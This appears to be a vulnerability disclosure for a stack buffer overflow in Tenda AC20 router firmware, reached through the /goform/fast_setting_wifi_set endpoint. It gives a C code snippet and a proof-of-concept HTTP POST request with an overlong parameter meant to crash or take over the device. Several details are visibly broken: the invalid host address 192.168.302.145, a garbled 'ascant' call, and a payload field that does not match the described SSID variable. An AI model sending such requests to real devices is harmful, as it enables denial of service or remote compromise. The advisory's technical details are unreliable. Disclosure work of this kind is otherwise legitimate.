### Critical Vulnerability Information #### Product and Vendor Information - **Vendor**: Shenzhen Tenda Technology Co., Ltd. - **Affected Product**: AC20 - **Affected Firmware Version**: <= V16.03.08.12 (latest version) - **Firmware Download URL**: tenda.com.cn/material/show/3264 #### Vulnerability Overview - **Vulnerability Type**: Buffer Overflow Vulnerability - **Trigger Condition**: An attacker sends a specially crafted HTTP POST request to the path `/goform/fast_setting_wifi_set`. When setting the SSID, due to lack of boundary checking on the `Var` variable, a stack overflow occurs. - **Impact**: May lead to Denial of Service (DoS) or Remote Code Execution (RCE). #### Vulnerability Details - **Critical Code Snippet**: ```c sscanf(Var + 1, "%d:%s", &ntr, var); n2 = ascant(var + 2, "%[^\"]", restr, var); ``` - The `sscanf` function parses the `Var` variable without boundary checks, causing a buffer overflow. - The `ascant` function further processes the string, also lacking boundary checks. #### POC (Proof of Concept) - **Request Example**: ```http POST /goform/fast_setting_wifi_set HTTP/1.1 Host: 192.168.302.145 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 X-Requested-With: XMLHttpRequest Referer: http://192.168.124.1/main.html Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 1000 ssid=12345&power_low=0&loginPwd=abcde&abckey=aabbccddeeffgghhiijjkkllmmnnooppqqrrssttuuvvwwxxyyzzAAABBBCCCDDDEEEFFF... ``` - **Response Example**: ```plaintext connect_No such file or directory ... form_fast_setting_wifi_set line:355 correct cmd is error. ``` ``` This information indicates a severe buffer overflow vulnerability. Attackers can trigger this vulnerability via specific HTTP requests, potentially leading to device crashes or remote compromise.